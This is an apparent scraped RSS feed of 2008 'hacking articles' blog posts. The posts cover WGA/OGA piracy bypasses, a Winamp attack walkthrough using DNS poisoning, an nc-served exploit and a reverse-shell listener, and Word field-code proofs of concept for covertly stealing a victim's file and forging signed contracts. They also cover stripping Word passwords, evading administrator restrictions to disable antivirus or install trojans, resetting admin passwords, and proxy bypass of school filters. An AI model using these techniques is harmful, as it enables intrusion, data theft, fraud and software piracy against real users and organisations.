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People are increasingly using their email accounts for more than just email - it has become their online document storage area with backup documents such as passwords, bank account numbers, account usernames, scans of correspondence and much more. Even if you don&rsquo;t use your email for this purpose, you may still be inadvertantly revealing personal information in general conversation emails to family and close friends. A 6GB Gmail account or an unlimited space Yahoo account is potentially an information bonanza source for identity thieves who manage to figure out your email password and then go snooping. But if someone HAS cracked your email password, it may not be apparent to you. A snooper can easily read an email then mark it as unread again. So the best thing to do would be to set up an &ldquo;electronic tripwire&rdquo; so if someone breaks into your account, you&rsquo;ll know about it. Here&rsquo;s how to do it : <ul>1. Sign up for a website hit counter at <a class="external" href="http://rahulhackingarticles.wetpaint.comhttp://www.onestatfree.com/" rel="nofollow" target="_blank">www.onestatfree.com</a>. You can leave a fake name and whatever URL you want (I used Google.com for mine). 2.  You will then receive a welcome email from OneStat with a text attachment called OneStatScript.txt. Download this attachment to your computer and then delete the email (you don&rsquo;t want any email snoopers finding it later). But before deleting the email, write down your OneStat account number as you will need it later.3.  Change the name of the text document to something that will make the email snooper salivate such as passwordlist.   Also change the file format from a text document to a website page.  So make it something like passwordlist.htm .4.  Email this newly-renamed file as an attachment to the email account you want to monitor. Make sure the email subject title also lures the snooper in (maybe something like List of Passwords. You get the idea :).5. The trap is now set. Basically if someone opens the email and opens the attachment, OneStat will record a hit. If you then log into your OneStat account say once a day, you will see how many hits you have had to your attachment. </ul> The OneStat account page then gives you details on each &ldquo;visitor&rdquo; including the date and time they accessed the web document and more importantly their location and IP address!   So how does having this information help you? Well first of all, it will alert you to change your password to something stronger. Secondly, if you see the snooper&rsquo;s location and you only know one or two people there then it narrows down your list of potential suspects. By the way, I recommended signing up for One Stat because the author of the original idea mentioned them. But if you know of any other hit counter services that send text documents to your email address, then please mention them in the comments. I don&rsquo;t have any financial advantage recommending One Stat so I am perfectly happy to consider alternative companies.<br><br>u may even use a return email notifications as read notify!!<br><br><br>_____________________________________________________________________________________________<br><br>few more<br><br><br><b> 1. Stop using Internet Explorer and make the switch to Opera, it&#39;s more secure, plain and simple. <br><br> 2. Get Spybot Search and Destroy or Spyware Doctor and immediately update it.<br><br> 3. Get Adaware SE and immediately update it. <br>(Use both as a 1-2 punch on infected client computers and between the two there&#39;s not much they won&#39;t kill) <br><br> 4. Update your anti virus <br><br> 5. Boot into safe mode and run all three scans <br><br> 6. While the scans are going check your registry (Click start --&gt; Run and type regedit to get intot he registry) and look in HKEY_CurrentUser/software/microsoft/windows/currentversion/run &amp; HKEY_Local_Machine/software/microsoft/windows/currentversion/run. Verify that all programs listed are legitimate and wanted. <br><br> 7. If or when your antivirus scan comes across anything, search for that file name in your registry and delete it. <br><br>8. Use explorer to go to the windows/system32 folder and sort by date. If you haven&#39;t already done so, make sure you can see the entire file names. click Tools --&gt; Folder Options and unclick the box labeled &quot;Hide extensions for known file types&quot; and under Hidden files and folders click &quot;Show hidden files and folders.&quot; However, make sure you choose &quot;Hide protected operating system files&quot; so you don&#39;t accidentally remove anything that would cripple your computer.. You are looking for recent files with names ending with .exe and .dll that look suspicious. Major culprits will have gibberish names such as alkjdlkjfa.exe. <br><br>9. Once you can get clean scans in safe mode, reboot in normal mode and scan all over again. If you can&#39;t get a clean scan in regular mode then you have something more persistant that could take more research. <br><br> 10. Make sure your firewall doesn&#39;t have strange exceptions. <br><br>11. If you suspect anything that is going wrong with your computer is the action of a stalker, on a more secure system change all your passwords. <br><br>12. If your system has been specifically targeted and hacked you can never be 100% sure that your system is no longer compromised so start with 11, make backups of personal files on the infected system and format and re-install Windows. <br><br>Good luck!<br><br></b><h3><b>Post your comment If u can share More !</b></h3><br><b>Rahul</b><br><br><h3></h3><br><hr size="1"><br/>]]></description></item><item><title>Bypass windows Validation</title><link>http://rahulhackingarticles.wetpaint.com/page/Bypass+windows+Validation</link><author>rahuldutt1</author><guid isPermaLink="false">http://rahulhackingarticles.wetpaint.com/page/Bypass+windows+Validation</guid><pubDate>Mon, 19 May 2008 04:38:51 CDT</pubDate><description><![CDATA[ 			<h3><a href="http://rahulhackingarticles.wetpaint.com/" name="_Toc102496693" target="_self">Defeating WGA (Windows Genuine Advantage) Validation</a></h3><b><br>Disclaimer : This article is for educational Purpose only</b><br><br><br><br><br>Microsoft WGA validation check can be defeated and any Microsoft product with the WGA validation feature can be run and installed on machines running pirated copy of Windows XP. To bypass WGA validation check, one can run &ldquo;<b>GenuineCheck.exe</b>&rdquo; file on a machine running a copy of an authentic Windows XP for generating a key code. This key code generated on the machine running genuine copy of Win XP can be used to circumvent the WGA check on the machine running a pirated copy of Win XP. <br><br>Below given are the steps to defeat WGA validation check on a pirated copy of Win XP &ndash;<br><br><i><b><a href="http://rahulhackingarticles.wetpaint.com/page/Other+Ways+to+Bypass+the+Windows+genuine+advantage+Validation" target="_self">Click here for smart ways to bypass Windows Validation</a></b></i><br><br><br><b>Case Study &ndash; Download and Install Windows AntiSpyware on a pirated copy of Windows XP</b><br><br><b>Steps for Bypassing WGA Validation Check</b><br>  <ol start="1"><li class="MsoNormal">Visit      the Microsoft download link to download a copy of Windows Anti-Spyware. </li></ol>  <br><br>   <br>   <br>  <ol start="2"><li class="MsoNormal">After      clicking on the &ldquo;<b>Windows      Anti-Spyware</b>&rdquo; link in the download section the following screen will      appear with a &ldquo;<b>Continue</b>&rdquo; button      in it. Click on the &ldquo;<b>Continue</b>&rdquo;      button to go to the next screen. </li></ol>  <br><br> <br>  <ol start="3"><li class="MsoNormal">The      screenshot below is the next screen that appears after <b>step 2</b>. Select the first option and      click on the &ldquo;<b>Continue</b>&rdquo; button.      </li></ol>  <br><br>   <br>     <ol start="4"><li class="MsoNormal">The      screenshot below is the next screen that appears after <b>Step 3</b>. Scroll down to the &ldquo;<b>Alternative Validation Section</b>&rdquo;      and click on the link &ldquo;<b>Genuine      Windows Validation, Alternate Method</b>&rdquo;. </li></ol>  <br> <br>  <ol start="5"><li class="MsoNormal">The      following page appears after clicking on the &ldquo;<b>Genuine Windows Validation, Alternate Method</b>&rdquo; link. To      download a copy of &ldquo;<b>GenuineCheck.exe</b>&rdquo;,      click on the &ldquo;<b>Continue</b>&rdquo; button.      </li></ol>  <br><br>   <br>     <ol start="6"><li class="MsoNormal">After      downloading &ldquo;<b>GenuineCheck.exe</b>&rdquo;,      run it on the machine running a genuine copy of Windows XP. It will      generate a code which is used for WGA validation. Copy the code and use      the same code to validate a pirated copy of Windows XP and bypass the WGA.</li></ol><u>Get the code from any of ur friends/Uncle/College PC which has Genuine Copy</u><br>  <br> <br><br>  <ol start="7"><li class="MsoNormal">The      code generated in the above step can be copied and pasted on to the WGA      validation page on a machine running a pirated copy of Windows XP. Then      click on the &ldquo;<b>Validate</b>&rdquo; button      to continue. Since the code was generated on the machine running a genuine      copy of the OS, the online validation fails to identify the pirated copy      of the OS and allows the software to be downloaded and installed.</li><br></ol><ol start="7"></ol> <ol start="7"><br></ol>  <br><br>  <ol start="8"><li class="MsoNormal">After      the code is &ldquo;<b>Validated</b>&rdquo; on the machine      running a pirated copy of Windows XP, the following download screen      appears. Now the software can be downloaded and installed on the pirated      copy of Windows XP without any problem.</li></ol><br> <br><br><br>Love this article : post comment ( start a thread )<br>or<br>check out<br><i><b><a href="http://rahulhackingarticles.wetpaint.com/page/Other+Ways+to+Bypass+the+Windows+genuine+advantage+Validation" target="_self">Click here for smart ways to bypass Windows Validation</a></b></i><br>  <br><hr size="1"><br/>]]></description></item><item><title>Other Ways to Bypass the Windows genuine advantage Validation</title><link>http://rahulhackingarticles.wetpaint.com/page/Other+Ways+to+Bypass+the+Windows+genuine+advantage+Validation</link><author>rahuldutt1</author><guid isPermaLink="false">http://rahulhackingarticles.wetpaint.com/page/Other+Ways+to+Bypass+the+Windows+genuine+advantage+Validation</guid><pubDate>Mon, 19 May 2008 04:36:33 CDT</pubDate><description><![CDATA[<b><br><br>Check out some smart ways Too!<br><br><br>Select the Office version from the above link and try downloading any updates / add-ins related to that<br>specific version. It will lead to a validation link (Refer the screenshot below) which will check whether the office<br>installed in the system is genuine or not. In short the OGA validation generates a hash out of information<br>gathered from the installed MS Office and passes it on to the server for verification. The user will be<br>directed to the download link only if the installed office version is genuine.<br>To defeat such validation, follow the extremely simple steps &ndash;<br>- Select the add-ins / updates that you require for office<br>- In the Validation required page, copy the file name<br><br> <br><br>Use google and search for the filename using the following search keyword combination:<br>site:download.microsoft.com/download &lt;File Name&gt;<br>For Example: To search for the file name &ldquo;RedactionSetup.msi&rdquo; use the following search key<br>combination site:download.microsoft.com/download RedactionSetup.msi<br>- The above search result spits the direct link to the file available on the Microsoft download server<br>which can be used to directly download the file without any validation check (Refer the screenshot<br>below for details).<br><br> <br><br>It is possible to re-use the hash generated in any machine having genuine copy of MS Office and can be<br>distributed over the internet.<br>For example &ndash; The table below has hashes for downloading rhdtool.exe and RedactionSetup.msi which can be<br>re-used by any user having pirated copy of Office to defeat OGA validation check.<br>http://www.microsoft.com/downloads/details.aspx?FamilyID=144E54ED-D43E-42CA-BC7B-<br>5446D34E5360&amp;displaylang=en&amp;Hash=[Put the hash here]<br><br> <br><br>Method 3: A Quick Analysis of OGACheckControl.dll<br>Last but not the least is analyzing OGACheckControl.dll and preparing a patch. However just to keep<br>myself away from those scary legal notices, I do not want to release any patch at this point of time. I did a<br>quick reverse analysis while I was about to finish my last latte; below are few interesting sections which one<br>may like to look at without wasting much of time -<br>a. Creation of Hash -&gt; Hashing the stream of data and computation of cryptographic hash of a stream of data<br><br>Leave a comment if u wanna know bt it!<br><br><br><br></b><hr size="1"><br/>]]></description></item><item><title>How to Hack through Winamp</title><link>http://rahulhackingarticles.wetpaint.com/page/How+to+Hack+through+Winamp</link><author>rahuldutt1</author><guid isPermaLink="false">http://rahulhackingarticles.wetpaint.com/page/How+to+Hack+through+Winamp</guid><pubDate>Mon, 19 May 2008 03:10:58 CDT</pubDate><description><![CDATA[How Hackers Take over Through Winamp!!<br><br><br><br><br> <br><br> Winamp has an option, enabled by default, which checks on startup for<br> the latest version from www.winamp.com and will then notify the user of<br> a possible upgrade via messagebox..<br> <br><br> Unfortunately, if it were to receive a huge response, the thread<br> parsing the data is thrown into an infinite loop and eventually the<br> exception dispatcher is called.. and then like most of the time under<br> windows, a big, bad, overflow occurs.. i am attaching the real example<br> <br><br> Sample attack<br><br> ============= <br><br> <br><br> Nameserver - 192.168.0.1<br><br> attacker - 192.168.1.2<br><br> victim (windows machine) - 192.168.0.2<br><br> <br><br> 1) attacker poisons nameserver cache<br> <br><br> 192.168.1.2:<br><br> x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2<br><br> <br><br> <br><br> 2) victim is now resolving www.winamp.com to attacker machine<br><br> <br><br> 192.168.0.2:<br><br> C:&gt;nslookup www.winamp.com<br><br> Server: z3.names.int<br><br> Address: 192.168.0.1<br><br> <br><br> Name: www.winamp.com<br><br> Address: 192.168.1.2<br><br> <br><br> <br><br> 3) attacker fires up exploit as web daemon<br><br> <br><br> 192.168.1.2:<br><br> x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80<br><br> <br><br> <br><br> 4) attacker waits for connect-back by exploit<br><br> <br><br> 192.168.1.2:<br><br> x@x:~$ nc -l -p 5555<br><br> <br><br> <br><br> 5) foolish winamp user opens winamp!<br><br> <br><br> 192.168.0.2:<br> <br><br> opens winamp, prepares for The Weather Girls - It\&#39;s<br><br> Raining Men.mp3<br><br> <br><br> 6) BOOJAH!@<br><br> <br><br> 192.168.1.2:<br><br> <br><br> x@x:~$ nc -l -p 5555<br><br> Microsoft Windows 2000 [Version 5.00.2195]<br><br> (C) Copyright 1985-2000 Microsoft Corp.<br><br> <br><br> C:&gt;<br><br><br>/// control over machine taken<br><hr size="1"><br/>]]></description></item><item><title>Microsoft Office Hacks</title><link>http://rahulhackingarticles.wetpaint.com/page/Microsoft+Office+Hacks</link><author>rahuldutt1</author><guid isPermaLink="false">http://rahulhackingarticles.wetpaint.com/page/Microsoft+Office+Hacks</guid><pubDate>Mon, 19 May 2008 02:50:59 CDT</pubDate><description><![CDATA[<b>This article is just to make u aware of knowm existing threats<br>only for educational purpose.</b><br><font color="#ff0000"><b><br><br></b></font><br><br>  I have stumbled onto a couple potential security issue in Microsoft<br>  Word blogs i would like to share. In both cases the adversary (mis)uses<br>  fields to perpetrate the attack. It&#39;s important to note that fields are not macros and, as far<br>  as I know, cannot be disabled by the user. I am providing a basic<br>  description along with a proof-of-concept demo. I am fairly certain<br>  that someone with free time and imagination can expand on these<br>  principles, possibly applying them to other products.<br>  <br><br>  Following tradition I&#39;ll use Hacker and Victim as the two parties involved.<br>  Hacker will be the adversary.<br>  <br><br>  1) Document collaboration spyware.<br><br>  <br><br>  Attack Basics: Hacker sends Victim a Word document for revisions. After Victim<br>  edits, saves, and mails it back to Hacker the file will also include<br>  contents of another file(s) from Victim&#39;s computer that Hacker has<br>  specified a priori. To achieve this, Hacker embeds the INCLUDETEXT field<br>  into the document. The field results in inclusion of a specified file<br>  into the current document. Of course, Hacker must be careful include it<br>  in such a way that it does not become apparent to Victim. Hacker can do all<br>  the usual things like hidden text, small white font, etc. Alternatively<br>  (and in my opinion cleaner, she can embed the INCLUDETEXT field within<br>  a dummy IF field that always returns an empty string. In this case, the<br>  only way Victim can notice the included file is if he goes browsing<br>  through field codes.<br>  <br><br>  Attack Improvements: The disadvantage of the basic attack is that Hacker<br>  must rely on Victim to update the INCLUDETEXT field to import the file. If<br>  the document is large and contains tables of contents, figures, etc.<br>  then Victim is very likely to update all the fields. However, Hacker would<br>  like to make sure that the field gets updated regardless of whether Victim<br>  does it manually or not. Automatic updates can be forced if a DATE<br>  field is embedded into the INCLUDETEXT and it is the last date field in<br>  the document (don&#39;t ask me why).<br>  <br><br>  Proof of concept: Inserting the following field structure into the<br>  footer of the last page will steal the contents of c:a.txt on the<br>  target&#39;s computer. Keep in mind the plain curly braces below must<br>  actually be replaced with Word field braces (you can either use the<br>  menus to insert fields one by one, or ask google how to do it by hand).<br>  <br><br>  <font color="#0000ff">{ IF { INCLUDETEXT { IF { DATE } = { DATE } &quot;c:\a.txt&quot; &quot;c:\a.txt&quot; } * MERGEFORMAT } = &quot;&quot; &quot;&quot; * MERGEFORMAT }<br></font><br>  <br><br>  Countermeasures: The only thing you can do now is decide how paranoid<br>  you want to be. If you must edit and send out a Word file with unknown<br>  origins, you may want to manually go through the fields. It would be<br>  nice to be able to force user confirmation (via a dialog box) for all<br>  includes. Alternatively one could write a scanner. Of course an optional<br>  standalone checker will never be used by those most at risk.<br>  <br><br>  2) Oblivious signing<br><br>  <br><br>  Attack Basics: Hacker and Victim wants to sign a contract saying that Hacker<br>  will pay Victim $100. Hacker types it up as a Word document and both<br>  digitally sign it. In a few days Victim comes to Hacker to collect his<br>  money. To his surprise, Hacker presents him with a Word document that<br>  states he owes her $100. Hacker also has a valid signature from Victim for<br>  the new document. In fact, it is the exact same signature as for the<br>  contract Victim remembers signing and, to Victim&#39;s great amazement, the two<br>  Word documents are actually identical in hex. What Hacker did was insert<br>  an IF field that branched on an external input such as date or<br>  filename. Thus even though the sign contents remained the same, the<br>  displayed contents changed because they were partially dependent on<br>  unsigned inputs. The basic point is that very few users know the actual<br>  contents of their Word documents and it should be obvious that one<br>  should never sign what one cannot read. Of course, Victim could contest<br>  the contract in court. An expert witness (that&#39;s actually an expert)<br>  could easily demonstrate that there are unsigned inputs and therefore<br>  it is not clear which version was actually signed. Thus Victim can get out<br>  of the fraudulent contract. However, the same logic will hold for Hacker<br>  and she gets away without paying Victim $100 she signed for. Thus, an<br>  adversary can build in a free escape clause. Note that I am just<br>  speculating about all the legal aspects.<br>  <br><br>  Proof of concept: Inserting the following field structure at the tail<br>  of the document will cause &quot;Hello&quot; to be displayed if the filename is<br>  &quot;a.doc&quot; and &quot;Bye&quot; otherwise.<br>  <br><font color="#0000ff"><br>  { IF { FILENAME * MERGEFORMAT { DATE } } = &quot;a.doc&quot; &quot;Hello&quot; &quot;Bye&quot; * MERGEFORMAT }<br><br><br><font color="#ff0000">Update : this flaw has been fixed in office 2003 onwards<br>but still works in office 2000 and even sometimes in 2002/03</font><br><br>__________________________________________________________________________<br></font><br><font color="#ff0000"><b>We can<br> consistently crash Word 2000 using the following method:</b></font><br><br> 1) Open up any text/document editor such as notepad or wordpad<br> 2) type a single word (must be a known word, no punctuation).<br> 3) highlight the whole word and CTRL+C<br> 4) launch word 2000<br> 5) CTRL+V<br> 6) press HOME to take you to the start of the line<br> 7) type I<br> 8) hit the space bar<br><br> This consistenly crashes Word 2000 with the following error<br> message:<br><br> DDE Server Window: WINWORD.EXE - Application Error<br> The instruction at &quot;0x3076a63e&quot; referenced memory at &quot;0x00000000&quot;. The<br> memory could not be &quot;read&quot;.<br><br><br><br><br><br>Vulnerability:<br><br><b><font color="#ff0000">remove office passwords</font></b><br>Vulnerable:<br><br>MS Word (Win2K/XP)<br><br><br><br>Example 1<br><br>1) Open MS Word with a new/blank page<br><br>2) Now select &quot;Insert&quot; &gt;&gt; &quot;File&quot; &gt;&gt; browse for your password protected doc &amp; select &quot;Insert&quot; &amp; &quot;Insert&quot; password protected doc into your new/blank doc<br><br>3) Now select &quot;Tools&quot; &amp; Whey hey, voila, there&#39;s no longer an &quot;Unprotect document&quot; ... password vanished ...<br><br><br><br>Example 2<br><br>1) open your password protected doc in MS Word i.e. you can&#39;t edit protected fields (apparently)<br><br>2) Save as a Rich Text Format (RTF) &amp; keep this RTF file open in MS Word (YES, keep open)<br><br>3) Whilst your new RTF file is open in MS Word, go &quot;File open&quot; &amp; find your newly saved RTF file &amp; open (YES, you DO need to do &#39;tis even though you already have it open)<br><br>4) If prompted to revert say YES, if not prompted stay calm. Now in your MS Word menu go &amp; &quot;Unprotect document&quot;, amazingly, voila, you don&#39;t get prompted for a password<br><br><br><br><br><br>Change password if ya like &amp; or save in whatever format if ya like ...<br><hr size="1"><br/>]]></description></item><item><title>Breaking the Restrictions of the Administrator</title><link>http://rahulhackingarticles.wetpaint.com/page/Breaking+the+Restrictions+of+the+Administrator</link><author>rahuldutt1</author><guid isPermaLink="false">http://rahulhackingarticles.wetpaint.com/page/Breaking+the+Restrictions+of+the+Administrator</guid><pubDate>Sat, 17 May 2008 03:58:33 CDT</pubDate><description><![CDATA[ 			<br><br><br><br><br><h2>  <b>A Loophole u never knew about : Rahul</b></h2>  <h2>  </h2>  <h2>  </h2>   <br> <br> <br><b>This works on WIn 2000 &amp; WIN XP. <br><br>Dis can be used to gain access to the website you want to <br>for free, and how you can gain access to &#39;control panel&#39;, and the various <br>other tools of Widows that may have been blocked from your grasp like &#39;regedit&#39; by the administrator. IT can be used in schools &amp; colleges.. <br></b><b><br>When u are at the log on screen, type in your username and <br>password. NOW When you hit enter, and it comes up with <br>the next screen, the rectangle one, immediatly pull out the network <br>cable i.e. the cable wire. <br><br>Now u can log on without any restrictions because when the cable is pulled off then it does not download any settings from the server. Now you have access to control panel, &amp; all the other features which had been blocked BUT there will be no <br>network access. But that&#39;s cool because now we can access &#39;Internet options&#39;, <br>click in the &#39;connections&#39; tab click the LAN settings, click the proxy <br>settings, and in the little white box at the bottom we can specify websites <br>that bypass the proxy server (eg www.yahoo.com) Now once you have changed <br>the settings to what you wish, apply them and restart the computer. Now get someone else to log onto it because if you log in it will load the cached settings from your previous log in, then after the other person logs in, everyone that logs in after them included themselves will have the <br>internet settings you specified. <br><br>Its only an &#39;Unplugging technique&#39; to gain access to a comp. locked by the administrator. <br><br>Now you can gain access to msconfig, regedit, command etc disable the virus scanner, or to install a trojan or a virus according to u&#39;re will..<br><br><br><br></b><h3><i><b>XP HOME ADVANCED FILE PERMISSIONS.!!</b></i></h3><b><br><br><br>Access *Advance file Permissions* on NTFS file systems for XP Home simply by booting into *Safe Mode*, rt-clicking any file or folder, and navigating to the *Security tab*. This gives the user the ability to allow or deny read, write, execute, read &amp; write, display contents, full-control, iheritance, and take ownership permissions, with many more options available to apply to different users and groups stored on the computer. Well, you don&#39;t have to do this in *Safe Mode* (XP Home). Although it is a little less intuitive, you can simply go to your command prompt - Start&gt;All Programs&gt;Accessories&gt;Command Prompt. Now type &quot;cacls&quot; in the window (without the quotes). This gives you the ability to add, remove or modify file permissions on files and folders through the command prompt. Type &quot;cacls /?&quot; for help on different options and variables. You do not need to be in safe mode to use this so it makes it a little quicker than using the safe mode security tab GUI. Remember - this only applies to NTFS. Here also is a very useful link to find a lot of extras and tweaks straight from the horse&#39;s mouth - the Microsoft Resource Center. You will find a lot of very useful web-based extra&#39;s here, most of them left unknowing to the general public - such as, &quot;Online Crash Analysis&quot; - a site that looks like Windows Update but you can upload your crash &quot;dump logs&quot; (when you get those system or application crash error reports). Microsoft will then analyze the log file and tell you some more info about WHY the system crashed (ie. faulty hardware/software/conflicts, etc).<br><br><br>Now lets c how to open restricted site on college servers<br>Rahul recommends : <a class="external" href="http://rahulhackingarticles.wetpaint.comhttp://unblockall.net/" rel="nofollow" target="_blank">http://unblockall.net/</a><br></b><ul><li>Bypass any filters from work or school and access your favorite community and entertainment sites       </li><li>Enjoy a fast and reliable connection. Our dedicated machines have 1Gbps connection and 2 quad processors       </li><li>Chat with your friends from work       </li><li>Watch videos on Youtube       </li><li>Login into Myspace, Facebook and all the popular community sites without losing the proxy       </li><li>No traffic redirection       </li><li>No PopUp and Annoying Ads!       </li></ul>             To use our service, simply type the address of the web site which you want to open in the field above and hit GO. This       will automatically lead you to the destination page. With our service you are guaranteed to be able to login and       operatate normally.      <br><b><br>                              </b>   <h3>  PLEASE DROP IN YOUR COMMENTS BELOW</h3>  <h3>  RAHUL DUTT AVASTHY</h3><br><hr size="1"><br/>]]></description></item><item><title>Hack Administrator</title><link>http://rahulhackingarticles.wetpaint.com/page/Hack+Administrator</link><author>rahuldutt1</author><guid isPermaLink="false">http://rahulhackingarticles.wetpaint.com/page/Hack+Administrator</guid><pubDate>Thu, 15 May 2008 09:05:23 CDT</pubDate><description><![CDATA[<br>Here we present the rock solid windows hacks<br>for educational purpose only! read disclaimer before reading this article! <br><br>_____<br><br><b>Windows NT/2000/XP/Vista offline password editor:<br><a class="external" href="http://rahulhackingarticles.wetpaint.comhttp://home.eunet.no/%7Epnordahl/ntpasswd" rel="nofollow" target="_blank">http://home.eunet.no/~pnordahl/ntpasswd</a><br><br>This is a utility to (re)set the password of any user that has a valid (local) account on your Windows NT/2000/XP/2003/Vista system, by modifying the encrypted password in the registry&#39;s SAM file.<br>You do not need to know the old password to set a new one.<br>It works offline, that is, you have to shutdown your computer and boot off a floppy disk or CD. The boot-disk includes stuff to access NTFS partitions and scripts to glue the whole thing together.<br>Works with syskey (no need to turn it off, but you can if you have lost the key)<br>Will detect and offer to unlock locked or disabled user accounts!<br>Caution: If used on users that have EFS encrypted files, and the system is XP or later service packs on W2K, all encrypted files for that user will be UNREADABLE! and cannot be recovered unless you remember the old password again!<br>Download links:<br><a class="external" href="http://rahulhackingarticles.wetpaint.comhttp://home.eunet.no/%7Epnordahl/ntpasswd/cd070409.zip" rel="nofollow" target="_blank">cd070409.zip</a> (~3MB) - Bootable CD image with newer drivers<br><a class="external" href="http://rahulhackingarticles.wetpaint.comhttp://home.eunet.no/%7Epnordahl/ntpasswd/bd050303.zip" rel="nofollow" target="_blank">bd050303.zip</a> (~1.1MB) - Bootdisk image, date 050303.<br><a class="external" href="http://rahulhackingarticles.wetpaint.comhttp://home.eunet.no/%7Epnordahl/ntpasswd/sc050303.zip" rel="nofollow" target="_blank">sc050303.zip</a>(~1.4MB) - SCSI-drivers (050303) (only use newest drivers with newest bootdisk, this one works with bd050303)<br>To write these images to a floppy disk you&#39;ll need RawWrite2 which is included in the Bootdisk image download. To create the CD you just need to use your favorite CD burning program and burn the .ISO file to CD.<br></b><b><br><font color="#ff0000"><br>For Windows XP check out the attachment <u>Below the comments</u>!! It WORKS .AS IT CHANGES THE XP ADMIN PSWD WITHOUT U KNOWIN THE PREVIOUS ONE<br><br>however the &quot;net user&quot; and <br><br>&quot;control userpasswords2&quot; trick still works<br>: Rahul<br><br></font>You can change Administrator password from guest account without using any programs. It&#39;s easy: <br>1. Start-&gt; Run, type lusrmgr.msc and hit Enter. <br>2. You will see window with two folders:Users and Groups. Go in the Users folder, find the Administrator, right click-&gt; Set Password and now you can change the password without knowing the old one.</b><br><hr size="1"><br/>]]></description></item><item><title>Uninstalling Windows from Command Prompt</title><link>http://rahulhackingarticles.wetpaint.com/page/Uninstalling+Windows+from+Command+Prompt</link><author>rahuldutt1</author><guid isPermaLink="false">http://rahulhackingarticles.wetpaint.com/page/Uninstalling+Windows+from+Command+Prompt</guid><pubDate>Wed, 14 May 2008 09:17:39 CDT</pubDate><description><![CDATA[<b><font size="5"><br></font><font face="Tahoma" size="5"></font><font size="5">Uninstalling Windows from Command Prompt:</font><br><br>One option included in Windows XP is the ability to uninstall XP if you performed an upgrade from Windows 98, 98SE, or Windows Me.<br><br>The standard method of removing XP is achieved by booting into XP normally and uses the Add/Remove Programs tool in Control Panel.<br><br>If you are unable to start XP normally, the second option is to load XP in Safe Mode then use the same tool.<br><br>If you are unable to boot normally or boot into Safe Mode, XP can be removed by uninstalling from a Command Prompt.<br><br>The procedure is as follows:<br><br>Important Note: This procedure is available only if a successful image of the previous operating system was created during the XP upgrade.<br><br>Start the computer to Safe Mode with Command Prompt.<br><br>At the command prompt, type cd\, and then press ENTER.<br><br>Type cd\windows\system32, and then press ENTER.<br><br>Type osuninst.exe, and then press ENTER.<br><br>On screen instructions will guide you through the uninstall process to revert to the previous operating system.<br><br>This procedure can only be performed by users logged on as Administrator or a user with administrative rights.<br>For a complete list of command line programs u may also <a class="external" href="http://rahulhackingarticles.wetpaint.comhttp://www.ss64.com/nt/" rel="nofollow" target="_blank">Click Here</a><br><font color="#ff0000"><br></font></b><b><font size="5"><font size="3"><font color="#ff0000">This article is contributed by Tejaswi<br>U may compliment him or comment on this article <a href="http://rahulhackingarticles.wetpaint.com/account/tejaswi1988" target="_self">Here</a></font><br></font></font></b><hr size="1"><br/>]]></description></item><item><title>Powerful Gmail Tool</title><link>http://rahulhackingarticles.wetpaint.com/page/Powerful+Gmail+Tool</link><author>rahuldutt1</author><guid isPermaLink="false">http://rahulhackingarticles.wetpaint.com/page/Powerful+Gmail+Tool</guid><pubDate>Tue, 13 May 2008 15:57:20 CDT</pubDate><description><![CDATA[ 			<br><br>I am a hardcore user of Gmail, specially due to its best spam protection feature <br>However desire creates Needs and hence inventions<br>Here we are listing out one of the latest and most comprehensive Gmail Tool/Utility<br><br><h2><b>GTD Inbox</b></h2>GTDInbox is an addon for Firefox that transforms Gmail into a powerhouse of productivity and manageability. GTDInbox gives you a better inbox.<br>Visit <a class="external" href="http://rahulhackingarticles.wetpaint.comhttp://gtdinbox.com/support.htm" rel="nofollow" target="_blank">http://gtdinbox.com/support.htm </a>for the complete information.<br><br><br>Use It for<div class="feature"> 			<div class="col1"> 				<h3>Faster daily use of Gmail</h3> 				Do your most common functions within one or two intuitive clicks using a new popup command box that lets you preview, archive, delete or modify labels on your emails. 			</div> 			<div class="col2"> 				<a href="http://rahulhackingarticles.wetpaint.com/" target="_self"> 					  				</a> 			</div> 		</div> 		<div class="feature"> 			<div class="col1"> 				<h3>Turn email into tasks</h3> 				Mark emails as actions to be completed and give them a priority. Process actions by project, context or person. 			</div> 			<div class="col2"> 				<a href="http://rahulhackingarticles.wetpaint.com/" target="_self"> 					  				</a> 			</div> 		</div> 		<div class="feature"> 			<div class="col1"> 				<h3>Browse Gmail as a personal information database</h3> 				Categorise actions, communication and resources (e.g. files, meeting plans, invoices) into meaningful clusters - such as by project, context or contact - for easier information discovery and retrieval later. 			</div> 			<div class="col2"> 				<a href="http://rahulhackingarticles.wetpaint.com/" target="_self"> 					 </a><a class="external" href="http://rahulhackingarticles.wetpaint.comhttp://gtdinbox.com/assets/images/features-categorise.png" rel="nofollow" target="_blank" title="Cropped screenshot showing the GTD Box feature of GTDInbox"> 				</a> 			</div> 		</div><h3></h3><br><br><br> 						The Basic GTD Process in Gmail 					 					 						The key idea is that the inbox stays empty. Everything is classified or deleted, and then archived. 					 					 						Process 					 					<ul><li>Email arrives in your inbox 						</li><li>If it&#39;s an action...<br> If the action it represents (e.g. reply, send a file) can be done in two minutes, do it right now and then discard it. Otherwise, apply a status (next action if it&#39;s to be done today, action if it has to be done, someday/maybe if you might do it); and optionally give it an associated Project or Context (place where it must be done, e.g. office, home). </li><li>If it&#39;s some kind of resource...<br> For emails with files, or emails that contain important information, that can be considered resources. They can be associated with a Project, and given a Reference (e.g. &#39;meeting plan&#39;, &#39;balance sheet&#39;), which enables you to later ask &#39;find upcoming meeting plans for project X&#39;, or &#39;find balance sheet from contact y&#39;. </li><li>Once classified, click Archive to remove it from your inbox. 						</li><li>When the action is complete, or the resource is no longer relevant, you can either remove all Status labels - which implies it&#39;s no longer actionable - or label it Finished (to be explicit), or even just delete it. Unless you delete it, it will still be associated with the Project/Context for later historic reviews. </li></ul><br><br><h3> 						Using the Main Features</h3><br><br><h3><a href="http://rahulhackingarticles.wetpaint.com../" target="_self"> </a><a href="http://rahulhackingarticles.wetpaint.com../" target="_self"> 					</a> 					</h3>  					 						The Dashboard 					 					<a href="http://rahulhackingarticles.wetpaint.com/" target="_self"> 						  					</a><br> 					 						This is the central start point for reviews of things you must do, have done, or for looking up resources. 					 					 						Inbox GTD Popup<a href="http://rahulhackingarticles.wetpaint.com/" target="_self"> 					</a> 					 On any thread list (inbox, archive, sent items, etc.) you can right click the item that lets you preview the text of the item, add/remove labels, and archive or delete the item.<br><br>Compose Personal 					 				<br>	<a href="http://rahulhackingarticles.wetpaint.com/" target="_self"> 						  					</a><br> 					 Click &#39;Compose Personal&#39; to tune the compose screen to just send a message to yourself. This is particularly useful for creating personal tasks, especially if you also 